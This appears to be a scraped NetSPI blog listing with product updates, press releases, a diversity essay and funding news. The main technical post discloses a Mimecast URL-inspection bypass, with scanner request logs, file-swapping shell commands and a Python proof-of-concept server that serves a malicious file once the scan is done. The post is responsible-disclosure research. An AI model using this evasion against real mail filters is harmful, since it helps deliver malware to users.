Back

NetSPI Attack Surface Management Updates: Portfolio Dashboard & Perceptual Hashing

Hackers are highly motivated and incentivized to find new ways to gain access to your systems, expose your information, or even target your customers. To deliver the highest level of security and maintain a leadership position in the global offensive security space, NetSPI continues to invest in new technology, updated service capabilities, and the highest-quality teams. 

“On average, attack surface management tools initially discover 30% more cloud assets than security and IT teams even know they have,” according to Forrester’s Find And Cover Your Assets With Attack Surface Management report. Although some tools discovered several hundred percent more assets than they originally knew about. 

Top use cases for attack surface management technologies are asset discovery and inventory, supply chain and third-party risk management, M&A due diligence, and compliance management. NetSPI’s Attack Surface Management (ASM) development team recognized these common use cases and saw the need to categorize and sort information faster, easier, and in a more intelligent way.  

The IT and SOC teams we work with are not simply looking for more data – they are looking for more meaningful and actionable data, and our recent developments have been targeted towards that.  

As a result, we are proud to introduce two new features into NetSPI’s ASM solution: the Portfolio Dashboard and Perceptual Hashing.

The Portfolio Dashboard

The ASM Portfolio Dashboard allows your company a global risk view of your attack surface, specifically showing your corporate network along with all portfolio or client networks.

The Portfolio Dashboard is, simply put, a dashboard. This dashboard allows your company a global risk view of your attack surface, specifically showing your corporate network along with all portfolio or client networks. We’ve seen the most benefit from this feature in companies going through M&A processes, private equity firms, cyber insurance companies, parent companies, and conglomerates, along with many others. 

Organizations using ASM can now search and filter for a specific threat or technology within their entire portfolio. This enables them to clearly display the specific assets that have potential vulnerabilities and provide actionable information in seconds. 

A well-known example where NetSPI’s ASM Portfolio Dashboard would have proven valuable is Log4Shell. Log4Shell is a remote code execution vulnerability in Apache Log4j that allowed attackers to place malware on a targeted system, leading to the potential of a completely compromised network, theft of sensitive information, and more. 

Not good! 

In this example, non-portfolio companies were struggling to identify all affected assets within their network. Portfolio companies and cyber-insurance companies needed to not only identify assets within their own network, but they also needed to identify affected assets in their clients’ networks – searching every known potentially vulnerable asset to better understand their risk, while still missing every unknown asset. 

Again, not good! 

If the Log4j crisis happened today however, companies could leverage NetPI’s ASM portfolio dashboard to quickly and easily search for any affected device across their global attack surface. The potentially vulnerable assets would be displayed in a simple dashboard (as seen in the screenshot above) and allow IT and security teams to react accordingly, letting them efficiently target the most vulnerable areas, potentially saving the company and their customers from catastrophic damage.  

This is just one example of how the portfolio dashboard can benefit companies today. Although many organizations have remediated Log4Shell today, this feature can help in much the same way with other threats or technologies that may arise tomorrow, next week, or in the future. 

Perceptual Hashing

Perceptual Hashing analyzes these screenshots and categorizes them based on similar looks, styles, layouts, and images.

NetSPI’s current ASM offering routinely takes screenshots of all websites on your global attack surface. And we’re excited to share that the platform now includes Perceptual Hashing.  

Perceptual Hashing, sometimes referred to as Perceptual Image Hashing or Perceptual Sorting, analyzes these screenshots and categorizes them based on similar looks, styles, layouts, and images. These groups of screenshots are then reviewed by NetSPI’s ASM Operations Team to identify trends in your network or find outliers of websites running on your perimeter, and then notify your team. 

There are other types of hashing, such as average hashing, cryptographic hashing, geometric hashing, etc., however perceptual hashing is the most effective in cybersecurity because it is designed to recognize and group similar items even if minor modifications are made to the images such as compression, brightness, etc. As a result, images that are similar will be grouped together, however outliers will be detected and grouped separately.  

The intention is that if there is a vulnerability found on one of your public facing websites, Perceptual Hashing will allow you to search for similar webpages so you can review and take action. With NetSPI’s ASM continuous penetration testing capabilities and real-time reporting, teams will know if there are any publicly exposed management interfaces almost instantly and can respond accordingly. 

One of NetSPI’s ASM clients, a Fortune 500 technology company, recently used Perceptual Hashing to efficiently identify a vulnerability across various servers. The ASM Operations Team discovered a publicly exposed management interface in a proprietary web application during a routine scan, which left them vulnerable to external unauthenticated users accessing administrative functionality. The ASM team was able to take this finding and search the entirety of their other websites with the equivalent perceptual hash, identifying multiple other vulnerable servers. Once all were searched and the vulnerabilities were discovered, the team was able to report back to the company and guide them to remediate accordingly. 

Other cases where NetSPI’s Perceptual Hashing feature can be used are: 

  • Servers using specific landing pages or technologies 
  • Publicly exposed interface management 
  • Digital rights management 
  • Data deduplication 
  • Image searching 

These are just two examples of recent innovations added to NetSPI’s Attack Surface Management solution. Although Perceptual Hashing is my current favorite feature, there are many innovations in the works right now to continue delivering the highest quality security for customers with our technology driven, human delivered methodology. 

Other noteworthy updates to our ASM solution include: 

  • New intelligent search help – when users click on the search inputs, they are presented with helpful suggestions to deliver the best results. 
  • Users in the Domain, IP Address, and Port table views can now copy selected assets and port URLs to the clipboard. 
  • Users can add an attribution statement when adding assets. 
  • Domain and IP address exports have been updated to include ports and associated assets. 
  • Domains, Ports, and IP Addresses now have all associated screenshots available to view. 
  • When viewing the full details page for a Domain, you can now use the “Generate Report” button to get a summary report specifically for that domain. 
  • The main dashboard now shows you trends of all vulnerabilities on your attack surface over time, separated by severity. 
  • On the ASNs page, the ‘Scan for ASNs’ button now validates and updates existing ASN associations in addition to inserting newly identified ASNs. 
  • The Port Gallery has been converted to an Explore page with left-hand facet searches. 
  • SAML SSO now supports users from multiple domains. 
  • Ability to automatically transform invalid CIDR ranges when adding assets. 
  • New port intelligence, including status code, content type, content length, site title, JARM, and HTTP reachability. 

Additional updates can be found on the Attack Surface Management changelog: https://asm.netspi.com/guide/changelog/. 

To learn more about NetSPI’s Attack Surface Management, contact your rep or connect with us here

This blog post is a part of our offensive security product update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and AttackSim (Breach and Attack Simulation).

Back

NetSPI’s Patrick Sayler Earns Spot on Mimecast’s Security Researcher Wall of Fame for Email Defense Evasion

Patrick successfully bypassed Mimecast URL and file inspection features and worked with the email security company to remediate the issues.

Minneapolis, MN NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Principal Security Consultant Patrick Sayler was recognized on Mimecast’s Security Researcher Wall of Fame for bypassing email defenses within Mimecast Targeted Threat Protection (TTP). 

Patrick was able to bypass the URL and file inspection features which could have allowed an adversary to serve a malicious file or URL after Mimecast had already deemed it secure. A full breakdown of the process and remediation steps taken can be found on the NetSPI technical blog.

Patrick uncovered the vulnerability during a hybrid breach and attack simulation and social engineering penetration testing engagement for one of its clients. He worked closely with the Mimecast Responsible Disclosure Team to remediate the core issues identified within the TTP platform:  

  • The file content was not served by Mimecast (Mimecast has committed to implementing a fix
  • File inspection followed a predictable pattern (This issue has been addressed
  • Results were stored by filename and shared (Addressed via risk-based caching on a continuous basis

“This is a great reminder of the vital importance of defense in depth,” said Patrick. “When a frontline technical control fails, do you have back up, layered defenses and policies in place to slow down adversaries and prevent incident escalation? Social engineering and breach and attack simulation assessments can help organizations answer this question with confidence.” 

To learn more about NetSPI’s responsible disclosures and vulnerability research, visit https://www.netspi.com/pentesting-team/

About NetSPI  

NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn. 

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 

Back

Bypassing Mimecast URL and File Inspection

Mimecast Targeted Threat Protection (TTP) is a suite of email security tools designed to protect end users from phishing attacks. The URL Protection feature of this subscription can inspect links embedded in emails for malicious content. If a file is deemed safe, Mimecast will allow the user to retrieve it from the linked site. Files categorized as malicious are blocked and cannot be downloaded. 

Or so I thought.

TL;DR 

root@webserver:/var/www# ls 
malware.xls	not-malware.xls

root@webserver:/var/www# mv malware.xls not-malware.xls

During a hybrid breach and attack simulation and social engineering penetration test, I discovered a way to bypass Mimecast’s URL Protection and File Inspection features described above. 

Though, in the interest of transparency, I’m not sure I can claim that I discovered this issue. I would be surprised if this wasn’t already a known trick. Nevertheless, it was acknowledged by Mimecast and landed me a spot on their Security Researcher Wall of Fame.  

This is a great reminder of the importance of defense in depth strategies. In this instance, I was able to bypass, or evade, the email defense in place. When frontline security controls are bypassed, organizations must have back up, layered controls and policies in place to stop or slow down adversaries and prevent further incident escalation. 

I worked closely with Mimecast to responsibly disclose and remediate this issue. Let’s take a deeper look at the discovery and disclosure process. 

Workflow

Here’s what happens behind the scenes when an email containing links is sent to an inbox protected by Mimecast.  

We will use 2 different files in these examples: 

  • happy.xls – A nearly-empty spreadsheet which only contains text 
  • sad.xls – An Excel file containing a basic malicious macro 

Each will be served by a basic web server powered by the Python http.server module

  1. The end-user receives an email containing links to retrieve your files. 
Screenshot of email with links
  1. Clicking one of the links will result in the HTTP requests below. These are issued directly from Mimecast and are the “inspection” part of “URL Protection.” Take note of the timestamps and unique header values, as we’ll revisit these later. 
Web server logs showing that TTP retrieved the file

Request 1 (Mimecast) 

GET /happy.xls HTTP/1.1 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: january132022.com
Cache-Control: max-age=259200
Connection: keep-alive

Request 2 (Mimecast)

GET /happy.xls HTTP/1.1 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-gb,en;q=0.5
x-client-ip: 163.172.240.97
x-real-ip: 163.172.240.97
x-client: 163.172.240.97
Host: january132022.com
Cache-Control: max-age=259200
Connection: close
  1. If the file is deemed safe, Mimecast will present the Download button. Clicking this will result in a final request to finally retrieve the file. This request will be issued from your client, not from Mimecast
TTP classification

Request 3 (End User)

GET /happy.xls HTTP/1.1
Host: january132022.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
  1. However, if the file contents are found to be malicious, Mimecast Targeted Threat Protection will classify the file as harmful and prevent the user from accessing it. 
Web server logs showing that TTP retrieved the second file
TTP classification

The Problems 

Did anything in that process catch your eye? There are four core concerns I had with this process. Mimecast’s corresponding remediation steps for each of these problems can be found at the end of this article. 

1. File content is not served by Mimecast

After clicking the Download button, the end user will retrieve the file directly from the remote link.

2. A Predictable Pattern

HTTP requests generated by Mimecast file inspection follow a predictable pattern. In the workflow above, Requests 1 and 2 will always be issued in that exact order, in the same two-second interval, and with the shown header values.

This means that an attacker can accurately determine when a file has been inspected by TTP. By monitoring for the unique header values in Request 2 (i.e., x-client-ip, x-real-ip, x-client), the attacker can modify the subsequent response to Request 3 to return an entirely different set of file contents. This would allow an attacker to present a clean file to Mimecast, while serving malicious content to the end user.

These two items alone could compromise the integrity of inspection results. Though there’s a much simpler way to achieve the same result.

3. Results are Stored by Filename

That’s right! URLs are only inspected during their first visit by that user. If a URL is previously designated as safe, the content and classification will remain cached for a length of time. An attacker can bypass protections by simply renaming a malicious file to match the filename of a previously categorized safe file. This result remained for up to four hours in my testing; however, Mimecast has shared with me that they will look to address this via risk-based caching.

4. Results are Shared

While you can’t see it in the above screenshots, I found that links rewritten by TTP do not appear to be completely unique. Inspections, and their resulting categories, are seemingly persistent across identical messages sent from two different source addresses. An attacker could send a benign message to the target from Address A, then re-send the same message from Address B after the file has been categorized.

The Problems Combined

Let’s put everything together. To demonstrate the attack workflow, the examples below will pick up immediately after I attempted to click the Blocked file. 

  1. On the remote web server, rename the malicious file to match the filename of the safe file. Review the checksum to confirm that the file matches. 
# sha256sum happy.xls                          
87762ea8f248335b92bbadf71396305d2090537401d51d6a55df6754e74c2e25  happy.xls 

# sha256sum sad.xls 
131f2276d2003b22d51a8817817edd5ab2dcbb9b0b487f5149717e034d2b67e7  sad.xls 

# cp happy.xls backup_happy.xls 

# cp sad.xls happy.xls 

# sha256sum sad.xls 
131f2276d2003b22d51a8817817edd5ab2dcbb9b0b487f5149717e034d2b67e7  sad.xls 

# sha256sum happy.xls 
131f2276d2003b22d51a8817817edd5ab2dcbb9b0b487f5149717e034d2b67e7  happy.xls 

# ls
backup_happy.xls  happy.xls  nocachebasicweb.py  sad.xls

Renaming the malicious file to replace the safe file

  1. Return to the email and click the link to the safe file, which now hosts the contents of the malicious file. Review the web server logs and observe that Mimecast does not attempt to inspect the file a second time, resulting in the malicious file being classified as safe. Downloading and reviewing the file confirm that the malicious content was successfully downloaded. 
TTP incorrect classification
Web server logs showing that TTP did not inspect the file, and that it can be downloaded

TTPs against TTP

While you can certainly follow the “steps” outlined in the TL;DR, I think we can make this better. 

Proof-of-Concept 1: Automatic File Renaming

The Python script below will start a web server on the host and automatically rename a malicious file to an inspected, safe filename. Note that the below code is a basic example and will only function a single time. It is not clean, but it certainly does the job. 

Code: 

# NoCacheHTTPServer.py
# Made from https://stackoverflow.com/questions/42341039/remove-cache-in-a-python-http-server
import os
import http.server 

PORT = 80
count = 1 

class NoCacheHTTPRequestHandler( 
    http.server.SimpleHTTPRequestHandler 
): 
    def send_response_only(self, code, message=None): 
        resp = super().send_response_only(code, message) 
        self.send_header('Cache-Control', 'no-store, must-revalidate') 
        self.send_header('Expires', '0') 

        global count 
        count = count + 1 

        if count == 2: 
            print('[*] MIMECAST SCAN 1') 

        elif count == 3: 
            print('[*] MIMECAST SCAN 2') 
            print('[**] MIMECAST SCAN COMPLETE. REPLACING FILE.') 
            os.rename('thisfileissafe.xls', 'thisfileissafe.xls.bak') 
            os.rename('virus.xls', 'thisfileissafe.xls') 

if __name__ == '__main__': 
    http.server.test( 
        HandlerClass=NoCacheHTTPRequestHandler, 
        port=PORT 
    )

Proof-of-Concept 2: Automatic TTP Evasion

This one will start a web server on the host and serve safe content by default. It reviews each incoming request for the unique HTTP request headers provided by Mimecast URL Protection (x-client, x-client-ip, and x-real-ip). If these headers are detected, it will then automatically alter the response to the subsequent request and serve malicious content, then reset to safe content afterwards.  

This process will repeat each time the TTP headers are detected. This allows the attacker to evade future detections while continuing to deliver malicious content to additional victims. And just for good measure, the victim IP can be hardcoded to always serve the payload when they visit. 

The code below can be found on GitHub.  

Code: https://github.com/psayler/MrMimecast

Example:

Lingering Questions

This was discovered during an active engagement, so I was not in a position to review every single edge case. These are questions that I asked myself but were unable to answer.  

  • Are rewritten URLs shared across email accounts within the organization?
  • Are rewritten URLs shared across accounts in separate Mimecast tenants?
    • Ex: attacker@example.com sends an email to patrick@netspi.com and 
      steve@competitor.com. If Patrick clicks the link and causes the URL to be categorized, will that carry over to Steve’s link as well? 
    • If results are shared, an attacker could potentially pre-inspect and categorize files by sending messages to their own Mimecast subscription. 
  • How long is the scan result cached? My estimates were around 4 hours. This makes attacks somewhat time-sensitive, but still leaves a large window of opportunity. 

Recommendation to Mimecast

Users should be unable to retrieve an inspected file directly from the remote host. Instead, TTP should act as an intermediary and temporarily store a copy of the inspected file to serve to the user. This would address all of the demonstrated evasion methods. Future download attempts by the user should be served from TTP – either the previously cached version or a newly inspected copy. 

Disclosure, Feedback, and Timeline 

Mimecast has indicated that they will be implementing these suggestions and provided the following comments:  

  1. File content is not served by Mimecast 
    Mimecast has committed to implementing a fix. 
  2. A Predictable Pattern 
    This issue has been addressed. 
  3. Results are Stored by Filename 
    Addressed via risk-based caching on a continuous basis. 
  4. Results are Shared 
    Addressed via risk-based caching on a continuous basis. 

Unfortunately, without an active Mimecast subscription, I have no way to confirm if this is accurate.  

Below is a timeline of the disclosure process: 

  • 1/23/2022
  • 1/23/2022 – 1/31/2022
    • Revisiting the issue during an active engagement and notice that the “x-client” headers were no longer present 
    • Follow-up message sent to Mimecast to confirm if any changes have already been made 
  • 2/4/2022
    • Mimecast acknowledges the initial disclosure 
  • 3/7/2022
    • Mimecast confirms they can reproduce the issue 
    • Mimecast states that their engineers are working on a fix, based on the provided remediation guidance 
  • 3/8/2022 – 3/18/2022
  • 5/11/2022
    • Mimecast indicates that the fix is intended to be implemented by the end of August 2022 
  • 8/30/2022
    • Mimecast confirms August 2022 remediation timeline 
  • 9/1/2022
    • Draft blog post shared with Mimecast for review 
  • 9/16/2022 – 10/18/2022
    • Blog post feedback received from Mimecast 
    • Content amended to include the above 
Back

Tackling Diversity and Imposter Syndrome During Cybersecurity Awareness Month

Recent data indicates the cybersecurity industry continues to grapple with talent and skills gaps and the lack of diversity across its workforce. In fact, a recent survey from Boston Consulting Group revealed that 75% of cybersecurity workers are men, and in a recent survey from Heidrick & Struggles, only 14% of U.S. cyber leaders identified as women and/or people of color. Beyond this, for women, people of color, and entry-level or remote workers—imposter syndrome or feeling an inherent sense of otherness is not uncommon.  

As we amplify this year’s Cybersecurity Awareness Month theme “See Yourself in Cyber”, focusing on the people that make up the cybersecurity industry— it’s important to recognize what the industry can do to empower more people to see themselves in a cyber career. Here are a few steps we can take collectively to combat the issues surrounding imposture syndrome and diversity, and further progress as an industry. 

Overcoming Imposter Syndrome 

In order to “see yourself” you also must believe that you belong in cyber. When I first started my career in cybersecurity, I experienced a feeling that many of my other female peers have also experienced – that I needed to change to be “one of the guys.” 

Over time, I learned that my opinions and insights are just as valuable as those of my male peers. As such, I always make it a point to create safe spaces for employees to be themselves and feel empowered to advocate for themselves. Overcoming imposter syndrome requires reshaping your view of yourself and what makes you unique in a more positive light. Here are some techniques I’ve practiced to help me become more confident:  

  • Remember time is your biggest helper. As your confidence and knowledge grows in your position, things will get better. Remembering this can be helpful in and of itself. 
  • Take a step back. When you catch yourself playing the comparison game and losing, ask yourself, “am I really comparing apples to apples here?” Most of the time your answer will be “no.” Once you’ve gotten that more realistic perspective, it’s a lot easier to pull yourself out of a negative spiral and prevent the seeds of imposter syndrome from taking root. 
  • Know your own strengths and weaknesses. Having a more accurate self-image can help combat moments of imposter syndrome and can make it easier to set yourself up for success. If you have an over-inflated sense of some of your skills, you can be setting yourself up for failure. In the other direction, if you’re undervaluing your skills, that could cause you to pass on opportunities where you would’ve shined.  

Cultivating a Safe and Inclusive Culture 

Creating a culture where employees feel safe and empowered to do their best work is also essential in our industry. As an employer, it can help to ask the following questions:  

  • Do we encourage open feedback? 
    • Employees must feel empowered to let their teams/organization know what is and is not working for them. This will have a positive impact on work culture and overall productivity.  
  • Is self-care and mental health built into our culture? 
    • While employees must ultimately ensure they are creating a work-life balance for themselves, it’s difficult to do so without the support of a workplace that builds the concept of prioritizing mental health and self-care into their culture.  
  • Does our company culture inspire collectiveness? 
    • Creating spaces for human interaction can help everyone feel more connected, especially in a hybrid environment. At NetSPI, we have Slack channels dedicated to nearly every hobby and interest under the sun, and a “Kudos” channel for employees to call out their coworkers for a job well done. It’s a positive place for the entire organization to find community and celebrate together. This also reiterates that everything we do is a part of an ecosystem. 
  • Are we striving towards more diversity? 
    • Companies should have specific goals/initiatives to seek out diverse new hires. Consider implementing a Diversity, Equity, and Inclusion (DE&I) committee to both retain current diverse employees and reach out into the community. 
    • Every company should revisit their job descriptions and requirements, especially in the technical fields, to ensure they are inclusive of people that come from varying backgrounds. Focusing on hiring based on skillset allows us to open opportunities to those that will excel in the position that may have been prevented in the more traditional experienced-focused mindset. Ultimately, we must ask ourselves, “How do we make cybersecurity jobs more accessible to more people?” 

Championing More Diversity in Cybersecurity 

In order to achieve better growth and diversity in the cybersecurity workforce, more emphasis needs to be placed on the concept of variety in race, ethnicity, gender identity, and diversity of thought. This means developing a deeper understanding of the differences and experiences that shape people’s perspectives, and intentionally incorporating them into creative problem solving.  

When diversity is championed, it drives better culture, productivity, retention rates, and overall business success. Additionally, we can effectively reduce the “boys club” stigma commonly associated with the industry. Ultimately, this encourages more people to pursue cybersecurity-related education, leading to more diversity in the workforce.  

Furthermore, organizations must work together to provide more equitable learning, coaching and mentoring opportunities for talent new to the industry. At NetSPI, we are addressing this issue through NetSPI University, an extensive entry-level training program where candidates gain a baseline skill set to execute web application penetration testing and external network penetration testing, led by NetSPI’s expert pentesters.  

We have also started to partner with organizations such as WiCyS (Women in Cybersecurity) and Girls Hack Village whose purpose is to create a safe space for attendees to learn about cybersecurity and the challenges that women in the industry face.  

Most importantly, organizations must hold themselves accountable to take tangible steps towards more diversity. Beyond basic “check the box” hiring exercises, the question is: “How can cybersecurity leaders hold space and give credibility to varied voices and ideas?” As we take this month to reflect on ways in which we can move the cybersecurity industry forward, it’s imperative to remember that change starts with nurturing our people. 

Back

eSecurity Planet: NetSPI Lands $410 Million in Funding – And Other Notable Cybersecurity Deals

On October 17, NetSPI CEO Aaron Shilts was featured in the eSecurity Planet article called NetSPI Lands $410 Million in Funding – And Other Notable Cybersecurity Deals. Read the preview below or view it online.

+++

NetSPI, a top penetration testing and vulnerability management company, recently announced a $410 million funding round, a huge amount in a year in which $100+ million rounds have become a rarity. The investor was KKR, one of the world’s largest alternative asset firms.

KKR previously invested $90 million in NetSPI in May 2021, so NetSPI has demonstrated considerable traction since then.

That the funding round occurred in a difficult environment makes it all the more impressive. According to data from Crunchbase, the total amount of investments in cybersecurity startups came to $2.6 billion in the third quarter. This was the lowest since the same period in 2020.

The number of deals for this year’s Q3 was only 124. This is a level not seen since 2014.

Filling the Cybersecurity Talent Gap

Of course, the drop-off has been widespread across the tech sector. With a bear market, high inflation, rising interest rates, and concerns of a recession, investors are certainly getting more conservative – and generally focusing on top-notch deals.

As for NetSPI, it fits into this sweet spot. Founded over 20 years ago, the company’s vision is “technology powered, human delivered.” This involves sophisticated penetration testing for some of the world’s largest financial institutions, cloud operators, and healthcare organizations.

For the past five years, revenues have spiked by 5X. Organic growth was 50% in 2021 and 61% thus far in 2022.

“We combine human ingenuity from our 400 global offensive security professionals with our innovative technology platforms – a unique combination that ensures quality, consistency, transparency, accountability, and efficiency across all NetSPI assessments,” said Aaron Shilts, CEO, NetSPI.

A key focus is on hiring top talent in ethical hacking and adversary simulation and leveraging NetSPI’s three technology platforms, which include Resolve, ASM, and AttackSim.

“Additionally, the scarcity of talent is still one of the biggest issues in the cybersecurity industry,” said Shilts. “Investors are aware of this and have become acutely focused on acquiring organizations with a concentration on hiring the best talent globally and who offer programs to fill the talent gap.”

NetSPI plans to use the capital for investing in R&D, hiring, and global expansion. Part of the money will also be to recapitalize the equity investment of an early investor, Sunstone Partners.

You can read the full article at eSecurity Planet!

Back

Security Systems News: Inkhouse Virtual Media Panel on Diversity in Cybersecurity Touches on Key Insights

On October 14, NetSPI Managing Consultant Melissa Miller was featured in the Security Systems News article called Inkhouse Virtual Media Panel on Diversity in Cybersecurity Touches on Key Insights. Read the preview below or view it online.

+++

YARMOUTH, Maine – The tech industry and cybersecurity field remains for the moment an old boys club, however a group of leading women in security and human resources came together this week to discuss strengthening the industry through diversity.

The “Bridging the Security Talent Gap Through Diverse Viewpoints” virtual panel was hosted by Inkhouse, a Massachusetts based public relations firm. Guest speakers were joined by moderator Jessica Bettencourt to find an answer for the disparity in the security industry. According to Bettencourt, recent studies by (ISC)² show that women only make up 24% of the cybersecurity field, and more, that racial and ethnic minorities are more likely to face pay discrepancies and hold non-managerial roles at their companies.

As for more advice for job seekers looking to break into the market, Bettencourt asked panelists what some of the soft skills they most looked for in candidates.

“I have two here, the first as much as we may not like it is public speaking.” Melissa Miller, Managing Security Consultant at NetSPI stressed. Preparation and clarity are important in the role, and she said public speaking exhibits that perfectly. The second to her is passion for the field.

You can read the full article at Security Systems News!

Back

Help Net Security: NetSPI’s Blockchain Penetration Testing Service Helps Organizations Protect Blockchain Solutions

On October 11, NetSPI’s CTO Travis Hoyt was featured in the Help Net Security article called NetSPI’s NetSPI’s Blockchain Penetration Testing Service Helps Organizations Protect Blockchain Solutions. Read the preview below or view it online.

+++

NetSPI announced its new deployment-inclusive blockchain penetration testing service. The company will provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture’s unique security concerns.

Its blockchain penetration testing services will evaluate all deployment models, including private, permissioned, consortia, and public, and various distributed ledger technologies including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains, and more.

“Blockchain’s biggest innovations are below the surface,” according to the Forbes Blockchain 50 2022. The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain. Organizations are recognizing the scalability, competitive advantages, and revenue opportunities it presents.

“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions – this begins with identifying and addressing people, process, and technology gaps,” said Travis Hoyt, Chief Technology Officer at NetSPI. “Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”

Enterprises currently leveraging or evaluating the potential of blockchain can partner with NetSPI to improve the security of their deployments.

You can read the article at Help Net Security!

Back

MSSP Alert: NetSPI Launches Blockchain Penetration Testing Security Service

On October 10, NetSPI CTO Travis Hoyt was featured in the MSSP Alert article called NetSPI Launches Blockchain Penetration Testing Security Service. Read the preview below or view it online.

+++

Penetration testing and attack surface management provider NetSPI has launched its new blockchain penetration testing service.

NetSPI, in a prepared statement, stated it will “provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture’s unique security concerns.”

Capitalizing on Distributed Ledger Technology

The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain, according to NetSPI. Consequently, companies are recognizing the scalability, competitive advantages and revenue opportunities that distributed ledger technology presents.

NetSPI emphasized that its blockchain penetration testing services will evaluate all deployment models — private, permissioned, consortia and public, as well as various distributed ledger technologies, including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains.

NetSPI Chief Technology Officer Travis Hoyt explained the inspiration behind his company’s new blockchain penetration testing technology:

“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions. This begins with identifying and addressing people, process, and technology gaps. Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”

You can read the full article at MSSP Alert!

Back

CoinTrust: NetSPI Unveils Blockchain Penetration Trial Services for Enterprises

On October 10, NetSPI CTO Travis Hoyt was featured in the CoinTrust article called NetSPI Unveils Blockchain Penetration Trial Services for Enterprises. Read the preview below or view it online.

+++

NetSPI, the pioneer in corporate penetration testing and attack surface management, has introduced a new blockchain penetration testing solution that includes deployment. The business will give organizations with a complete, full-spectrum review of blockchain-based installations using its decades of penetration testing experience and knowledge of the architecture’s specific security problems.

Its blockchain penetration testing services will assess all deployment types, including private, permissioned, consortium, and public, as well as several distributed ledger technologies, such as ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms, and public chains, among others.

According to the Forbes Blockchain 50 2022, “Blockchain’s most significant advances remain concealed.” The world’s top corporations are increasingly using distributed ledger technology to conduct everyday operations, including the verification of insurance claims and the monitoring of car components across the supply chain. Organizations are becoming aware of its scalability, competitive benefits, and income prospects.

“As usage skyrockets, technology and security teams will need to rapidly grow their blockchain expertise to enable and secure these solutions – this starts with identifying and solving people, process, and technology gaps,” said NetSPI’s Chief Technology Officer, Travis Hoyt. Our new blockchain penetration testing service line reflects NetSPI’s unwavering commitment to the future, allowing our clients to do the same.

Enterprises who are actively using blockchain or exploring its possibilities may join with NetSPI to increase the security of their installations. For more information about NetSPI’s blockchain penetration testing services, please visit www.netspi.com or get in touch with us.

You can read the full article at CoinTrust!

Back

NetSPI Introduces Deployment-Inclusive Blockchain Security Services

The penetration testing company will help enterprises leveraging or exploring blockchain uncover the security weaknesses in their deployments.

Minneapolis, MN NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new deployment-inclusive blockchain penetration testing service. The company will provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture’s unique security concerns.

Its blockchain penetration testing services will evaluate all deployment models, including private, permissioned, consortia, and public, and various distributed ledger technologies including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains, and more.

“Blockchain’s biggest innovations are below the surface,” according to the Forbes Blockchain 50 2022. The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain. Organizations are recognizing the scalability, competitive advantages, and revenue opportunities it presents.

“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions – this begins with identifying and addressing people, process, and technology gaps,” said Travis Hoyt, Chief Technology Officer at NetSPI. “Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”

Enterprises currently leveraging or evaluating the potential of blockchain can partner with NetSPI to improve the security of their deployments.

To learn more about NetSPI’s blockchain penetration testing services, visit www.netspi.com or contact us.

About NetSPI  

